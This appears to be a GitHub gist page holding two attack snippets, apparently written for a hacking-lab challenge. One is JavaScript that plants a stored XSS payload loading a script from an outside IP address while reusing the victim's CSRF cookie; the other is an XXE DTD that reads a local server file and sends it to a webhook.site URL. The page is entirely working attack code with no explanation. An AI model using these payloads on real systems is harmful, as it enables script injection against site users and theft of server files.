anon KhalilKAN
KhalilKAN
/ gist:6ae7cb111fc5a8d9e3282cb1fdfddfb7
Created
October 5, 2025 04:42
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async () => { | |
| // --- Config --- | |
| const target = 'https://chl-d3417b06-e236-48d1-9727-254b9c974893-blog-hacklab-v2.softwareseguro.com.ar/profile'; | |
| const xss = `<script src="http://37.27.14.133/script.js"></script>`; // tu payload | |
| // Si el sitio usa CSRF (p.ej. Django), tomamos el token de la cookie "csrftoken" si existe | |
| const getCookie = (name) => | |
| document.cookie.split('; ').find(c => c.startsWith(name + '='))?.split('=')[1]; | |
| const csrf = getCookie('csrftoken'); |
KhalilKAN
/ gist:56c6bd8434041f103c7c3eeb8b873f50
Created
October 5, 2025 02:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "file:///proc/self/cwd/brand-guide.html"> | |
| <!ENTITY % send "<!ENTITY exfil SYSTEM 'https://webhook.site/32a94ce2-7ce8-40fc-b533-d01d35312bb4?d=%file;'>"> | |
| %send; |